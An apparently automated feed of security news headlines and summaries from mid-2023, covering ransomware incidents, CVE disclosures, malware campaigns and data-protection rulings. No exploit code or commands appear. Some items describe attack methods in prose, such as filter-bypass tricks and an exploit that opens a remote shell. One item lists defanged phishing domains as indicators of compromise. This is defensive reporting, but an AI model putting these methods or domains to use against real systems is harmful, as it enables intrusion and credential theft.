                The European Union Agency for Cybersecurity (ENISA) releases today its first cyber threat landscape report for the health sector. The report identifies prime threats, threat actors, and trends and covers a period of over 2 years. The […]

                The post Ransomware accounts for 54% of cyber threats in the health sector appeared first on Security Affairs.

                Autosummary: According to the report, organizations in the European health sector experienced a significant number of incidents, with healthcare providers accounting for 53% of the total incidents.


                CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector

                exploits industry
                2023-07-06 https://securityaffairs.com/148216/hacking/solarview-flaws-energy-sector.html

                A vulnerability in the SolarView product can be exploited in attacks targeting organizations in the energy sector. Researchers from the cybersecurity firm VulnCheck reported that the vulnerability CVE-2022-29303 in the solar power monitoring Contec SolarView product can be exploited in attacks targeting organizations in the energy sector. CVE-2022-29303 is an unauthenticated and remote command injection vulnerability […]

                The post CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector appeared first on Security Affairs.


                Microsoft investigates Outlook.com bug breaking email search

                exploits
                2023-07-06 https://www.bleepingcomputer.com/news/microsoft/microsoft-investigates-outlookcom-bug-breaking-email-search/
                Microsoft is investigating an ongoing issue preventing Outlook.com users from searching their emails and triggering 401 exception errors. [...]


                Cisco warns of bug that lets attackers break traffic encryption

                exploits
                2023-07-06 https://www.bleepingcomputer.com/news/security/cisco-warns-of-bug-that-lets-attackers-break-traffic-encryption/
                Cisco warned customers today of a high-severity vulnerability impacting some data center switch models and allowing attackers to tamper with encrypted traffic. [...]

                Autosummary: The vulnerability only impacts Cisco Nexus 9332C, 9364C, and 9500 spine switches (the last ones equipped with a Cisco Nexus N9K-X9736C-FX Line Card), and only if they are in ACI mode, are part of a Multi-Site topology, have the CloudSec encryption feature enabled, and are running firmware 14.0 and later releases.


                Android July security updates fix three actively exploited bugs

                exploits
                2023-07-06 https://www.bleepingcomputer.com/news/security/android-july-security-updates-fix-three-actively-exploited-bugs/
                Google has released the monthly security updates for the Android operating system, which come with fixes for 46 vulnerabilities. Three of the issues are likely actively exploited in the wild. [...]

                Autosummary: “There are indications that the following [vulnerabilities] may be under limited, targeted exploitation,” reads Google’s bulletin, highlighting CVE-2023-26083, CVE-2021-29256, and CVE-2023-2136.


                Free Akira ransomware decryptor released for victims who wish to recover their data without paying extortionists

                exploits ransomware
                2023-07-06 https://www.tripwire.com/state-of-security/free-akira-ransomware-decryptor-released-victims-who-wish-recover-their-data
                There’s good news for any business that has fallen victim to the Akira ransomware. Security researchers have developed a free decryption tool for files that have been encrypted since the Akira ransomware first emerged in March 2023. Read more in my article on the Tripwire State of Security blog.

                Autosummary: But, of course, as we all know, it’s often still the case that proper backup systems are not in place, or have not been properly tested to see if they will work properly if an emergency recovery of data is required. In order to crack the ransomware’s password, Avast’s tool asks for a sample Akira-encrypted file and a copy of the data file before it was hit by the ransomware attack.


                TXOne Networks introduces Stellar to secure OT/ICS devices from malware and abuse threats

                exploits industry
                2023-07-06 https://www.helpnetsecurity.com/2023/07/06/txone-networks-stellar/

                TXOne Networks announced its Stellar solution for defending operational stability. Employing TXOne Networks’ approach to security, Cyber-Physical System Detection and Response (CPSDR), Stellar supports the priorities of security and operations without either team having to sacrifice capability or performance. Already protecting customers in semiconductors, manufacturing, oil and gas, automotive, pharmaceuticals and many other industries, Stellar offers seamless detection and prevention capabilities with complete oversight for legacy and new OT devices. With intuitive management and informed … More

                The post TXOne Networks introduces Stellar to secure OT/ICS devices from malware and abuse threats appeared first on Help Net Security.



                ISACA joins ECSO to strengthen cybersecurity and digital skills in Europe

                ciber
                2023-07-06 https://www.helpnetsecurity.com/2023/07/06/isaca-ecso/

                ISACA is joining the European Cyber Security Organisation (ECSO). The membership will work to accelerate ECSO and ISACA’s shared commitment to advancing cybersecurity, fostering collaboration and driving digital trust across Europe. ISACA’s membership brings numerous benefits and opportunities for organisations and professionals across Europe. Through collaborating with ECSO, ISACA will share its expertise, resources, and training initiatives to develop the European cybersecurity ecosystem and enhance cybersecurity practices throughout the region. ISACA’s membership in ECSO will … More

                The post ISACA joins ECSO to strengthen cybersecurity and digital skills in Europe appeared first on Help Net Security.



                Surviving the 800 Gbps Storm: Gain Insights from Gcore’s 2023 DDoS Attack Statistics

                industry
                2023-07-06 https://thehackernews.com/2023/07/surviving-800-gbps-storm-gain-insights.html
                Gcore Radar is a quarterly report prepared by Gcore that provides insights into the current state of the DDoS protection market and cybersecurity trends. This report offers you an understanding of the evolving threat landscape and highlights the measures required to protect against attacks effectively. It serves as an insight for businesses and individuals seeking to stay informed about the

                Autosummary: [Figure: Attack type spread, Q1–Q2 2023: 52% UDP, 24% SYN flood, 19% TCP flood, 5% other traffic] According to Andrey Slastenov, Head of Web Security at Gcore, there has been an increase in the frequency of complex, multi-vector attacks by attackers. [Figure alt text: 30.1% Gaming, 24.7% Telecom, 16.8% Financial, 28.4% Other] The gaming industry was the most targeted sector, accounting for a considerable proportion of the DDoS attacks.


                Researchers Uncover New Linux Kernel "StackRot" Privilege Escalation Vulnerability

                exploits
                2023-07-06 https://thehackernews.com/2023/07/researchers-uncover-new-linux-kernel.html
                Details have emerged about a newly identified security flaw in the Linux kernel that could allow a user to gain elevated privileges on a target host. Dubbed StackRot (CVE-2023-3269, CVSS score: 7.8), the flaw impacts Linux versions 6.1 through 6.4. There is no evidence that the shortcoming has been exploited in the wild to date. "As StackRot is a Linux kernel vulnerability found in the memory


                CISA: Netwrix Auditor RCE bug exploited in Truebot malware attacks

                exploits
                2023-07-06 https://www.bleepingcomputer.com/news/security/cisa-netwrix-auditor-rce-bug-exploited-in-truebot-malware-attacks/
                CISA and the FBI warned today of new Truebot malware variants deployed on networks compromised using a critical remote code execution (RCE) vulnerability in the Netwrix Auditor software in attacks targeting organizations across the United States and Canada. [...]


                Ransomware Affiliates, Triple Extortion, and the Dark Web Ecosystem

                exploits
                2023-07-06 https://www.bleepingcomputer.com/news/security/ransomware-affiliates-triple-extortion-and-the-dark-web-ecosystem/
                In recent years a complex cybercrime ecosystem has emerged across Tor and illicit channels on Telegram. In this article, Flare explains how ransomware gangs and initial access brokers utilize this ecosystem. [...]

                Autosummary: [Figure: Ransomware group Lockbit’s ransomware blog page] Triple extortion: the group not only encrypts and exfiltrates data, but also additionally attempts to target specific employees, conduct a DDoS attack on the company, notify third parties of the company, or otherwise attempts to create additional leverage to force the victim to pay. An individual log can contain credentials for VPNs and business applications, online banks, retirement accounts, email addresses and more.


                Iranian Hackers’ Sophisticated Malware Targets Windows and macOS Users

                exploits
                2023-07-06 https://thehackernews.com/2023/07/iranian-hackers-sophisticated-malware.html
                The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware. "TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report. "When given the opportunity, TA453


                StackRot, a new Linux Kernel privilege escalation vulnerability

                exploits
                2023-07-06 https://securityaffairs.com/148231/security/stackrot-linux-kernel-privilege-escalation-bug.html

                StackRot is a new security vulnerability in the Linux kernel that could be exploited to gain elevated privileges on a target system. A security vulnerability, dubbed StackRot, was found impacting Linux versions 6.1 through 6.4. The issue, tracked as CVE-2023-3269 (CVSS score: 7.8), is a privilege escalation issue that resides in the memory management subsystem. An unprivileged […]

                The post StackRot, a new Linux Kernel privilege escalation vulnerability appeared first on Security Affairs.


                Warning issued over vulnerability in cardiac devices

                exploits
                2023-07-06 https://www.malwarebytes.com/blog/news/2023/07/warning-issued-over-vulnerability-in-cardiac-devices

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Medtronic

                Tags: Paceart Optima

                Tags: CVE-2023-31222

                Tags: deserialization

                Tags: update

                Tags: messaging

                A vulnerability in Medtronic’s Paceart Optima cardiac device could lead to further network penetration, RCE, and DoS attacks.

                The post Warning issued over vulnerability in cardiac devices appeared first on Malwarebytes Labs.

                Autosummary: The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about a vulnerability that could result in remote code execution or a denial-of-service (DoS) condition impacting a healthcare delivery organization’s Paceart Optima system.


                Update Android now! Google patches three actively exploited zero-days

                exploits
                2023-07-06 https://www.malwarebytes.com/blog/news/2023/07/update-android-now-google-patches-three-actively-exploited-zero-days

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Google

                Tags: Android

                Tags: 2023-07-05

                Tags: CVE-2021-29256

                Tags: CVE-2023-26083

                Tags: CVE-2023-2136

                Tags: CVE-2023-21250

                Tags: ARM

                Tags: Skia

                Google has patched 43 vulnerabilities in Android, three of which are actively exploited zero-day vulnerabilities.

                The post Update Android now! Google patches three actively exploited zero-days appeared first on Malwarebytes Labs.

                Autosummary: The CVEs listed as actively exploited are: CVE-2023-26083: a memory leak vulnerability in Mali GPU Kernel Driver in Midgard GPU Kernel Driver all versions from r6p0 - r32p0, Bifrost GPU Kernel Driver all versions from r0p0 - r42p0, Valhall GPU Kernel Driver all versions from r19p0 - r42p0, and Avalon GPU Kernel Driver all versions from r41p0 - r42p0 allows a non-privileged user to make valid GPU processing operations that expose sensitive kernel metadata.


                75% of consumers prepared to ditch brands hit by ransomware

                exploits ransomware
                2023-07-05 https://www.helpnetsecurity.com/2023/07/05/consumers-data-protection-request/

                As 40% of consumers harbor skepticism regarding organizations’ data protection capabilities, 75% would shift to alternate companies following a ransomware attack, according to Object First. Furthermore, consumers request increased data protection from vendors, with 55% favoring companies with comprehensive data protection measures such as reliable backup and recovery, password protection, and identity and access management strategies. As organizations intensify their digital transformation initiatives, data volume expands exponentially while ransomware attacks dominate … More

                The post 75% of consumers prepared to ditch brands hit by ransomware appeared first on Help Net Security.

                Autosummary: Consumers request increased data protection from vendors, with 55% favoring companies with comprehensive data protection measures such as reliable backup and recovery, password protection, and identity and access management strategies.


                How ransomware impacts the healthcare industry

                exploits ransomware industry
                2023-07-05 https://www.helpnetsecurity.com/2023/07/05/how-ransomware-impacts-healthcare-industry-video/

                Healthcare continues to be one of the most attractive targets for cyberattackers, and the number of breaches affecting the industry is increasing yearly. In this Help Net Security video, Steve Gwizdala, VP of Healthcare at ForgeRock, discusses how vigilance and new ways of enhancing cybersecurity measures will be crucial to healthcare organizations and businesses responsible for protecting consumers’ online information – across the entire supply chain. There needs to be more than the traditional password … More

                The post How ransomware impacts the healthcare industry appeared first on Help Net Security.



                Swedish data protection authority rules against the use of Google Analytics

                industry
                2023-07-05 https://securityaffairs.com/148157/laws-and-regulations/swedish-data-protection-authority-google-analytics.html

                The Swedish data protection watchdog warned businesses against using Google Analytics due to the risk of surveillance carried out by the US government. The Swedish Authority for Privacy Protection (IMY) conducted audits against CDON, […]

                The post Swedish data protection authority rules against the use of Google Analytics appeared first on Security Affairs.


                Japan’s largest port stops operations after ransomware attack

                exploits ransomware
                2023-07-05 https://www.bleepingcomputer.com/news/security/japans-largest-port-stops-operations-after-ransomware-attack/
                The Port of Nagoya, the largest and busiest port in Japan, has been targeted in a ransomware attack that currently impacts the operation of container terminals. [...]


                Node.js Users Beware: Manifest Confusion Attack Opens Door to Malware

                exploits
                2023-07-05 https://thehackernews.com/2023/07/nodejs-users-beware-manifest-confusion.html
                The npm registry for the Node.js JavaScript runtime environment is susceptible to what’s called a manifest confusion attack that could potentially allow threat actors to conceal malware in project dependencies or perform arbitrary script execution during installation. "A npm package’s manifest is published independently from its tarball," Darcy Clarke, a former GitHub and npm engineering manager

                Autosummary: "A npm package’s manifest is published independently from its tarball," Darcy Clarke, a former GitHub and npm engineering manager, said in a technical write-up published last week.


                New tool exploits Microsoft Teams bug to send malware to users

                exploits
                2023-07-05 https://www.bleepingcomputer.com/news/security/new-tool-exploits-microsoft-teams-bug-to-send-malware-to-users/
                A member of U.S. Navy’s red team has published a tool called TeamsPhisher that leverages an unresolved security issue in Microsoft Teams to bypass restrictions for incoming files from users outside of a targeted organization, the so-called external tenants. [...]

                Autosummary: [Figure: Phishing message as seen by the recipient (github.com/Octoberfest7)] TeamsPhisher first verifies the existence of the target user and their ability to receive external messages, which is a prerequisite for the attack to work.


                RedEnergy Stealer-as-a-Ransomware Threat Targeting Energy and Telecom Sectors

                exploits industry
                2023-07-05 https://thehackernews.com/2023/07/redenergy-stealer-as-ransomware-threat.html
                A sophisticated stealer-as-a-ransomware threat dubbed RedEnergy has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages. The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for

                Autosummary: Following a successful breach, the malicious binary is used as a conduit to set up persistence, perform the actual browser update, and also drop a stealer capable of covertly harvesting sensitive information and encrypting the stolen files, leaving the victims at risk of potential data loss, exposure, or even the sale of their valuable data.


                The Port of Nagoya, the largest Japanese port, suffered a ransomware attack

                exploits ransomware
                2023-07-05 https://securityaffairs.com/148184/cyber-crime/port-of-nagoya-ransomware-attack.html

                The Port of Nagoya, the largest port in Japan, suffered a ransomware attack that severely impacted its operations. The Port of Nagoya, in the Ise Bay, is the largest and busiest trading port in Japan, accounting for about 10% of the total trade value of Japan. Notably, this port is the largest exporter of cars […]

                The post The Port of Nagoya, the largest Japanese port, suffered a ransomware attack appeared first on Security Affairs.



                RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild

                exploits industry
                2023-07-05 https://securityaffairs.com/148193/malware/redenergy-stealer-as-a-ransomware.html

                RedEnergy is a sophisticated stealer-as-a-ransomware that was employed in attacks targeting energy utilities, oil, gas, telecom, and machinery sectors. Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors. The malware allows operators to steal information from various browsers, it also supports ransomware capabilities. […]

                The post RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild appeared first on Security Affairs.

                Autosummary: Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors.


                Malicious ad for USPS fishes for banking credentials

                financial
                2023-07-05 https://www.malwarebytes.com/blog/threat-intelligence/2023/07/malicious-ad-for-usps-phishes-for-jpmorgan-chase-credentials

                Categories: Threat Intelligence

                Tags: malvertising

                Tags: google

                Tags: usps

                Tags: phishing

                Next time you need to track a package, be aware that malicious ads could be leading you to sites that steal your banking information.

                The post Malicious ad for USPS fishes for banking credentials appeared first on Malwarebytes Labs.

                Autosummary: For example, here we have a VISA card and the associated bank is JP Morgan. For a different card such as MasterCard, here’s the associated phishing page. Falling for malvertising remains too easy: in the security field, we often speak about and recommend user education and training. Indicators of Compromise (IOCs): logictrackngs[.]com, super-trackings[.]com, web-trackings[.]com, tracks4me[.]biz, forgetrackng[.]com


                Mexico-Based Hacker Targets Global Banks with Android Malware

                financial exploits latam
                2023-07-04 https://thehackernews.com/2023/07/mexico-based-hacker-targets-global.html
                An e-crime actor of Mexican provenance has been linked to an Android mobile malware campaign targeting financial institutions globally, but with a specific focus on Spanish and Chilean banks, from June 2021 to April 2023. The activity is being attributed to an actor codenamed Neo_Net, according to security researcher Pol Thill. The findings were published by SentinelOne following a Malware



                Neo_Net runs eCrime campaign targeting clients of banks globally

                financial
                2023-07-04 https://securityaffairs.com/148137/cyber-crime/neo_net-ecrime-campaign-targets-banks.html

                A Mexican threat actor that goes online with the moniker Neo_Net is behind an Android malware campaign targeting banks worldwide. A joint study conducted by vx-underground and SentinelOne recently revealed that a Mexican threat actor that goes online with the moniker Neo_Net is behind an Android malware campaign targeting financial institutions worldwide. The case was […]

                The post Neo_Net runs eCrime campaign targeting clients of banks globally appeared first on Security Affairs.




                Google Analytics data transfer to U.S. brings $1 million fine to Swedish firms

                industry
                2023-07-04 https://www.bleepingcomputer.com/news/security/google-analytics-data-transfer-to-us-brings-1-million-fine-to-swedish-firms/
                The Swedish Authority for Privacy Protection (Integritetsskyddsmyndigheten - IMY) has fined two companies 12.3 million SEK (€1 million/$1.1 million) for using Google Analytics and warned two others about the same practice. [...]



                Swedish Data Protection Authority Warns Companies Against Google Analytics Use

                industry
                2023-07-04 https://thehackernews.com/2023/07/swedish-data-protection-authority-warns.html
                The Swedish data protection watchdog has warned companies against using Google Analytics due to risks posed by U.S. government surveillance, following similar moves by Austria, France, and Italy last year. The development comes in the aftermath of an audit initiated by the Swedish Authority for Privacy Protection (IMY) against four companies: CDON, Coop, Dagens Industri, and Tele2. "In its audits



                Elderly targeted in car accident scam, kingpin arrested

                financial
                2023-07-04 https://www.malwarebytes.com/blog/news/2023/07/elderly-targeted-in-car-accident-scam-kingpin-arrested

                Categories: News

                Categories: Personal

                Tags: Europol

                Tags: relative

                Tags: law enforcement

                The head of a criminal network responsible for defrauding hundreds of elderly people has been arrested, Europol has announced.


                The post Elderly targeted in car accident scam, kingpin arrested appeared first on Malwarebytes Labs.


                Autosummary: Don’t fall for them: it is important to stay vigilant and protect yourself from scam calls by following these guidelines. Don’t share personal or financial information with unknown or unexpected callers. If someone is saying they are a relative of yours, check via another way, by calling them back on their own phone or by other means, to verify it is really them.


                BlackCat Operators Distributing Ransomware Disguised as WinSCP via Malvertising

                exploits ransomware
                2023-07-03 https://thehackernews.com/2023/07/blackcat-operators-distributing.html
                Threat actors associated with the BlackCat ransomware have been observed employing malvertising tricks to distribute rogue installers of the WinSCP file transfer application. "Malicious actors used malvertising to distribute a piece of malware via cloned webpages of legitimate organizations," Trend Micro researchers said in an analysis published last week. "In this case, the distribution

                Autosummary: IBM Security X-Force, in a recent deep dive, said the gang's crypters, which are applications designed to encrypt and obfuscate malware to evade detection by antivirus scanners and hinder analysis, are being used to also disseminate new malware strains such as Aresloader, Canyon, CargoBay, DICELOADER, Lumma C2, Matanbuchus, Minodo (formerly Domino), Pikabot, SVCReady, and Vidar.


                300,000+ Fortinet firewalls vulnerable to critical FortiOS RCE bug

                exploits
                2023-07-03 https://www.bleepingcomputer.com/news/security/300-000-plus-fortinet-firewalls-vulnerable-to-critical-fortios-rce-bug/
                Hundreds of thousands of FortiGate firewalls are vulnerable to a critical security issue identified as CVE-2023-27997, almost a month after Fortinet released an update that addresses the problem. [...]

                Autosummary: To demonstrate that CVE-2023-27997 can be used to execute code remotely on vulnerable devices, Bishop Fox created an exploit that "smashes the heap, connects back to an attacker-controlled server, downloads a BusyBox binary, and opens an interactive shell."


                CISA Flags 8 Actively Exploited Flaws in Samsung and D-Link Devices

                exploits
                2023-07-03 https://thehackernews.com/2023/07/cisa-flags-8-actively-exploited-flaws.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a set of eight flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. This includes six shortcomings affecting Samsung smartphones and two vulnerabilities impacting D-Link devices. All the flaws have been patched as of 2021. CVE-2021-25394 (CVSS score: 6.4) - Samsung mobile



                Experts detected a new variant of North Korea-linked RUSTBUCKET macOS malware

                exploits
                2023-07-03 https://securityaffairs.com/148042/malware/rustbucket-macos-malware.html

                Researchers spotted a new version of the RustBucket Apple macOS malware that supports enhanced capabilities. Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. In April, the security firm Jamf observed the North Korea-linked BlueNoroff APT group using a new macOS malware, dubbed RustBucket. The group BlueNoroff is considered a group that […]

                The post Experts detected a new variant of North Korea-linked RUSTBUCKET macOS malware appeared first on Security Affairs.


                Autosummary: The malware is a Rust binary that gathers info of the infected system (computer name, list of active processes, current timestamp, installation timestamp, system boot time, and status of all running processes within the system) and downloads and runs additional malicious code.


                Hackers target European government entities in SmugX campaign

                government
                2023-07-03 https://www.bleepingcomputer.com/news/security/hackers-target-european-government-entities-in-smugx-campaign/
                A phishing campaign that security researchers named SmugX and attributed to a Chinese threat actor has been targeting embassies and foreign affairs ministries in the UK, France, Sweden, Ukraine, Czechia, Hungary, and Slovakia since December 2022. [...]

                Autosummary: Map of SmugX targets (Check Point). Among the samples that Check Point collected during the investigation are: a letter from the Serbian embassy in Budapest; a document stating the priorities of the Swedish Presidency of the Council of the European Union; an invitation to a diplomatic conference issued by Hungary’s Ministry of Foreign Affairs; and an article about two Chinese human rights lawyers. The lures used in the SmugX campaign betray the threat actor's target profile and indicate espionage as the likely objective of the campaign.


                CISA adds Samsung and D-link bugs to its Known Exploited Vulnerabilities catalog

                exploits
                2023-07-03 https://securityaffairs.com/148079/security/cisa-adds-samsung-and-d-link-bugs-to-its-known-exploited-vulnerabilities-catalog.html

                US CISA added actively exploited Samsung and D-Link vulnerabilities to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added six Samsung and two D-Link vulnerabilities to its Known Exploited Vulnerabilities Catalog. Below is the list of flaws added to the catalog: The CVE-2019-17621 flaw is a remote command execution flaw that resides in […]

                The post CISA adds Samsung and D-link bugs to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.




                Confusion at Twitter continues over Elon Musk's tweet limits

                ransomware
                2023-07-03 https://www.bbc.co.uk/news/technology-66087172?at_medium=RSS&at_campaign=KARANGA
                Elon Musk provoked a Twitter backlash after introducing limits to the number of tweets users can read.



                Microsoft denies data breach, theft of 30 million customer accounts

                financial
                2023-07-03 https://www.bleepingcomputer.com/news/security/microsoft-denies-data-breach-theft-of-30-million-customer-accounts/
                Microsoft has denied the claims of the so-called hacktivists "Anonymous Sudan" that they breached the company's servers and stole credentials for 30 million customer accounts. [...]



                Week in review: 5 free online cybersecurity courses, 8Base ransomware group leaks data

                exploits ransomware ciber
                2023-07-02 https://www.helpnetsecurity.com/2023/07/02/week-in-review-5-free-online-cybersecurity-courses-8base-ransomware-group-leaks-data/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Unlocking internet’s secrets via monitoring, data collection, and analysis In this Help Net Security interview, Ryan Woodley, CEO of Netcraft, discusses the importance of monitoring, collecting, and analyzing internet data to gain a profound understanding of the internet. Preparing health systems for cyber risks and insurance coverage In this Help Net Security interview, Dennis Fridrich, VP of Cybersecurity at TRIMEDX, … More

                The post Week in review: 5 free online cybersecurity courses, 8Base ransomware group leaks data appeared first on Help Net Security.




                Hackers Exploiting Unpatched WordPress Plugin Flaw to Create Secret Admin Accounts

                exploits
                2023-07-01 https://thehackernews.com/2023/07/unpatched-wordpress-plugin-flaw-could.html
                As many as 200,000 WordPress websites are at risk of ongoing attacks exploiting a critical unpatched security vulnerability in the Ultimate Member plugin. The flaw, tracked as CVE-2023-3460 (CVSS score: 9.8), impacts all versions of the Ultimate Member plugin, including the latest version (2.6.6) that was released on June 29, 2023. Ultimate Member is a popular plugin that facilitates the

                Autosummary: "While the plugin has a preset defined list of banned keys, that a user should not be able to update, there are trivial ways to bypass filters put in place such as utilizing various cases, slashes, and character encoding in a supplied meta key value in vulnerable versions of the plugin," Wordfence researcher Chloe Chamberland said.


                Beware: New "Rustbucket" Malware Variant Targeting macOS Users

                exploits
                2023-07-01 https://thehackernews.com/2023/07/beware-new-rustbucket-malware-variant.html
                Researchers have pulled back the curtain on an updated version of an Apple macOS malware called Rustbucket that comes with improved capabilities to establish persistence and avoid detection by security software. "This variant of Rustbucket, a malware family that targets macOS systems, adds persistence capabilities not previously observed," Elastic Security Labs researchers said in a report



                Avast released a free decryptor for the Windows version of the Akira ransomware

                exploits ransomware
                2023-07-01 https://securityaffairs.com/148007/cyber-crime/akira-ransomware-decryptor.html

                Avast released a free decryptor for the Akira ransomware that can allow victims to recover their data without paying the ransom. Cybersecurity firm Avast released a free decryptor for the Akira ransomware that can allow victims to recover their data without paying the ransom. The Akira ransomware has been active since March 2023, the threat […]

                The post Avast released a free decryptor for the Windows version of the Akira ransomware appeared first on Security Affairs.


                Autosummary: The Akira ransomware has been active since March 2023. The threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. Akira is a Windows ransomware with a 64-bit Windows binary; it is written in C++ and uses the Boost library to implement the asynchronous encryption code.


                LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC

                ransomware industry
                2023-07-01 https://securityaffairs.com/148022/cyber-crime/tsmc-lockbit-ransomware.html

                The LockBit ransomware gang claims to have hacked Taiwan Semiconductor Manufacturing Company (TSMC). The LockBit ransomware group this week claimed to have hacked the Taiwan Semiconductor Manufacturing Company (TSMC) and demanded a $70 million ransom. TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc. As reported by BleepingComputer, on Wednesday, […]

                The post LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC appeared first on Security Affairs.




                BlackCat ransomware pushes Cobalt Strike via WinSCP search ads

                exploits ransomware
                2023-07-01 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-pushes-cobalt-strike-via-winscp-search-ads/
                The BlackCat ransomware group (aka ALPHV) is running malvertising campaigns to lure people into fake pages that mimic the official website of the WinSCP file-transfer application for Windows but instead push malware-ridden installers. [...]

                Autosummary: Other tools used by ALPHV: PsExec, BitsAdmin, and Curl, used for lateral movement; AnyDesk, a legitimate remote management tool abused for maintaining persistence; and a KillAV BAT script used for disabling or bypassing antivirus and antimalware programs. (Figure: complete attack chain, Trend Micro.) Having Cobalt Strike running on the system, it is easy to execute additional scripts, fetch tools for lateral movement, and generally deepen the compromise.


                Employees worry less about cybersecurity best practices in the summer

                ciber
                2023-06-30 https://www.helpnetsecurity.com/2023/06/30/summer-byod-policies/

                IT teams are struggling to monitor and enforce BYOD (Bring Your Own Device) policies during summer months when more employees are often traveling or working remotely, according to ThreatX. With more endpoints and applications in use, and often personal rather than corporate-issued, the risk to corporate data may increase. Given APIs are the driving force behind these connections, the study reinforces the need for prioritizing API and application security. ThreatX surveyed 2,000 consumers across … More

                The post Employees worry less about cybersecurity best practices in the summer appeared first on Help Net Security.


                Autosummary: “Factors such as increased remote work and travel, and even employees’ children using parents’ devices to browse the internet and play games, all can potentially expose corporate data through attacked APIs,” said Jeremy Ventura, Director, Security Strategy & Field CISO at ThreatX. “To avoid this, it’s important organizations strengthen the visibility and security by tracking, monitoring, and uncovering vulnerable API and applications,” Ventura added.


                miniOrange’s WordPress Social Login and Register plugin was affected by a critical auth bypass bug

                exploits
                2023-06-30 https://securityaffairs.com/147981/hacking/wordpress-social-login-and-register-plugin-auth-bypass.html

                A critical authentication bypass flaw in miniOrange’s WordPress Social Login and Register plugin can allow an attacker to gain access to any account on a site. Wordfence researchers discovered an authentication bypass vulnerability in miniOrange’s WordPress Social Login and Register plugin that can allow an unauthenticated attacker to gain access to any account on a site by knowing the associated email […]

                The post miniOrange’s WordPress Social Login and Register plugin was affected by a critical auth bypass bug appeared first on Security Affairs.


                Autosummary: WordPress Social Login Plugin allows social login, social share and commenting using widely used apps like Facebook, Google, LinkedIn, Twitter, Apple, Discord, Twitch, Line, WeChat, and 40 other apps.


                North Korea-linked Andariel APT used a new malware named EarlyRat last year

                exploits
                2023-06-30 https://securityaffairs.com/147976/apt/andariel-apt-earlyrat-malware.html

                North Korea-linked cyberespionage group Andariel used a previously undocumented malware called EarlyRat. Kaspersky researchers reported that the North Korea-linked APT group Andariel used a previously undocumented malware dubbed EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. The Andariel APT (aka Stonefly) has been active since at least 2015 and was involved in several attacks attributed to the North Korean government. The […]

                The post North Korea-linked Andariel APT used a new malware named EarlyRat last year appeared first on Security Affairs.


                Autosummary: The experts also identified a set of off-the-shelf tools used by Andariel during the command execution phase, including Supremo remote desktop, 3Proxy, Powerline, Putty, Dumpert, NTDSDumpEx, and ForkDump. The malware EarlyRat was dropped via phishing messages using weaponized documents.


                Cybercriminals Hijacking Vulnerable SSH Servers in New Proxyjacking Campaign

                ciber
                2023-06-30 https://thehackernews.com/2023/06/cybercriminals-hijacking-vulnerable-ssh.html
                An active financially motivated campaign is targeting vulnerable SSH servers to covertly ensnare them into a proxy network. "This is an active campaign in which the attacker leverages SSH for remote access, running malicious scripts that stealthily enlist victim servers into a peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain," Akamai researcher Allen West said in a Thursday



                Free Akira ransomware decryptor helps recover your files

                exploits ransomware
                2023-06-30 https://www.bleepingcomputer.com/news/security/free-akira-ransomware-decryptor-helps-recover-your-files/
                Cybersecurity firm Avast has released a free decryptor for the Akira ransomware that can help victims recover their data without paying the crooks any money. [...]

                Autosummary: Akira encryption: Avast's analysis of Akira's encryption scheme confirms previous reports, describing that the malware uses a symmetric key generated by CryptGenRandom, which is then encrypted by a bundled RSA-4096 public key and appended to the end of an encrypted file.


                TSMC denies LockBit hack as ransomware gang demands $70 million

                exploits ransomware
                2023-06-30 https://www.bleepingcomputer.com/news/security/tsmc-denies-lockbit-hack-as-ransomware-gang-demands-70-million/
                Chipmaking giant TSMC (Taiwan Semiconductor Manufacturing Company) denied being hacked after the LockBit ransomware gang demanded $70 million not to release stolen data. [...]

                Autosummary: TSMC is one of the world's largest semiconductor manufacturers, with its products used in a wide variety of devices, including smartphones, high-performance computing, IoT devices, automotive, and digital consumer electronics.


                Eight-year election ban for Brazil's Bolsonaro

                latam
                2023-06-30 https://www.bbc.co.uk/news/world-latin-america-66070923?at_medium=RSS&at_campaign=KARANGA
                Ex-President Jair Bolsonaro is barred from running for office by the top electoral court.



                Hackers exploit zero-day in Ultimate Member WordPress plugin with 200K installs

                exploits
                2023-06-30 https://www.bleepingcomputer.com/news/security/hackers-exploit-zero-day-in-ultimate-member-wordpress-plugin-with-200k-installs/
                Hackers exploit a zero-day privilege escalation vulnerability in the "Ultimate Member" WordPress plugin to compromise websites by bypassing security measures and registering rogue administrator accounts. [...]

